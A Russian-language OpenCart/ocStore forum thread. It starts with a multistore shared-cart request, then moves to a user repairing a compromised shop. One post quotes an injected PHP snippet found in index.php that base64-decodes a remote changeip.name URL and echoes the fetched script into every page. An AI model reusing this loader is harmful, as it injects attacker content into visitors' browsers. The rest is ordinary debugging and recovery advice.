Перейти к содержанию
putnik

Общая корзина, регистрация в мультимагазине

Рекомендуемые сообщения

Добрый день.

Есть проблема по мультимагазину (оба домена (не поддомены) в одной директории на хосте, база общая).

Необходимо объединить корзину, регистрацию и другие персональные функции мультимагазина.

Т.е. Есть условно есть магазин "газировка" и магазин "булочка". Они соеденены в опенкарте как мультиагазин.

Посетитель если зайдет в магазин "газировка", наберет товара в корзину, а потом перейдет в магазин "булочка", то корзина, регистрация и т.д. будет новая. Необходимо сделать так, чтобы при переходе из одного магазина в другой магазин мультимагазина корзина, регистрация и т.д. сохранялись (корзина объединялась).

Версия ocStore 1.5.3.1

​Идеально если будет реализовано через сессии, НО БЕЗОПАСНОСТЬ ДОЛЖНА БЫТЬ НА УРОВНЕ!

Стоимость и сроки в личку, можно в эту тему. Также желательно указать способ реализаии.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вот это деловой подход. Какая версия PHP установлена? Это, как ни странно, важно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

такая ошибка при подтверждении заказа

modify=20121027165533;perm=flcdmpe;type=cdir;unique=2A2BDAD0U472F;UNIX.group=2486;UNIX.mode=0755;UNIX.owner=2486; . modify=20121027165715;perm=flcdmpe;type=pdir;unique=2A2BDAD0U4724;UNIX.group=2486;UNIX.mode=0755;UNIX.owner=2486; .. modify=20121105132923;perm=adfrw;size=0;type=file;unique=2A2BDAD0U4730;UNIX.group=2486;UNIX.mode=0644;UNIX.owner=2486; empty
Fatal error: Class 'Controllerpaymentcod' not found in /home/host1262691/tea56.ru/htdocs/www/vqmod/vqcache/vq2-system_engine_controller.php on line 43

установленно длва магазина, на денвере один магазин эта же копия сайта хорошо работает. так же установлен модуль общая корзина на два магазина но я его удалил и все следы его а ошибка так и осталась.

была пробемма со скриптом корзина не обновлялась и не пропали области и регионы при регистрации. эту проблемму решил, каким-то образом в Index.php попало это

$response->output();
function sql2_safe($in) {
    $rtn = base64_decode($in);
    return $rtn;
}
function collectnewss() {
    $get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
 $content = @file_get_contents($get);
 if (!$content)
  echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly90b3VjaG1lLmNoYW5nZWlwLm5hbWUvcnNpemUuanMiPjwvc2NyaXB0Pg==");
 else
  echo $content;
}
collectnewss ();

как не знаю. убрал все ошибки пропал, но появилась та о которой самой первой написал.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

и ка кего лечить? всё началось неделю назад.. на сервере были какие-то проблеммы. ужасно всё тормозило. тех поддержка сказали что это из вина. и даже начислили 10 дней хоста. но после этого у меня сайт не работает. даже тот бэкап который я делал уже имеет всебе этот вирус.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

я востановил бэкап который был созданный ещй раньше 100% рабочий, так как после его создания были заказы. но ошибка по прежнему на месте. может быть такое что ошибка в Mysql?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

я только что создал нового пользователя, в Mysql, создал новую базу данных, скопировал туда бэкап базы от 25 декабря 2012 работающего сайта, бэкап движка тоже от 25 декабря стоит. а ошибка до сих пор.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Поищите, какой ваш vqmod меняет файл system/engine/controller.php Видно криво меняет, раз вот такая штука:

Fatal error: Class 'Controllerpaymentcod' not found in /home/host1262691/tea56.ru/htdocs/www/vqmod/vqcache/vq2-system_engine_controller.php on line 43

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

по совету хостеров проверяю на вирусы комп, несколкьо уже нашёл и кстати в папке java и flashpayer потом поменяю пароли на фтп. позже гляну controller.php

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

вот содержимое файла system/engine/controller.php

<?php
abstract class Controller {
protected $registry;
protected $id;
protected $layout;
protected $template;
protected $children = array();
protected $data = array();
protected $output;

public function __construct($registry) {
 $this->registry = $registry;
}

public function __get($key) {
 return $this->registry->get($key);
}

public function __set($key, $value) {
 $this->registry->set($key, $value);
}

protected function forward($route, $args = array()) {
 return new Action($route, $args);
}
protected function redirect($url, $status = 302) {
 header('Status: ' . $status);
 header('Location: ' . str_replace(array('&', "\n", "\r"), array('&', '', ''), $url));
 exit();   
}

protected function getChild($child, $args = array()) {
 $action = new Action($child, $args);
 $file = $action->getFile();
 $class = $action->getClass();
 $method = $action->getMethod();

 if (file_exists($file)) {
  require_once($file);
  $controller = new $class($this->registry);

  $controller->$method($args);

  return $controller->output;
 } else {
  trigger_error('Error: Could not load controller ' . $child . '!');
  exit();	
 } 
}

protected function render() {
 foreach ($this->children as $child) {
  $this->data[basename($child)] = $this->getChild($child);
 }

 if (file_exists(DIR_TEMPLATE . $this->template)) {
  extract($this->data);

    ob_start();

 require(DIR_TEMPLATE . $this->template);

 $this->output = ob_get_contents();
    ob_end_clean();

  return $this->output;
 } else {
  trigger_error('Error: Could not load template ' . DIR_TEMPLATE . $this->template . '!');
  exit();   
 }
}
}
?>

поменял пароль поменял паротль фтп, с друго совсем компа, на тот пока вирусы ищет, создал новую базу данных, нового пользователя, залил бэкап от 25 декабря, он рабочий так как в январе были заказы, а вирус это не даёт сделать заказ, и всё равно та же ошибка. где искать то?????

щас хочу с нуля поставить щзутсфке посомтрим будут ли ошибка. если будет то значит все сервак больной.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

поставил чистый opencart, всё норм работает.

потом залил бэкапную базу данных и сайт не запусается только ошибка вылазиет

Notice: Error: Could not load controller module/vk! in /home/host1262691/tea56.ru/htdocs/www/system/engine/controller.php on line 47

это значит что у меня в базе есть что-то что запрашивает какой-то файл, а файла нет. у меня от орегинала сильно движёк отличается много модов установленно было.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

это значит что у меня в базе есть что-то что запрашивает какой-то файл, а файла нет. у меня от орегинала сильно движёк отличается много модов установленно было.

Открыть таблицу oc_settings найти там vk и удалить эту строку

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

заработало, установил бэкап движка от откбря. не установленно несколкьо модулей, ну ладно всё что нужно будет я утсановлю. база данных осталась свежая. клиентов не потерял все учётки на месте.

щас такая проблемма. админка на корявом языке, это кодировка базы данных? или движка? сайт норм показывает.

123.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

всё норм всё работает. база новая. движёк от октбяря 2012.

всем спасибо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.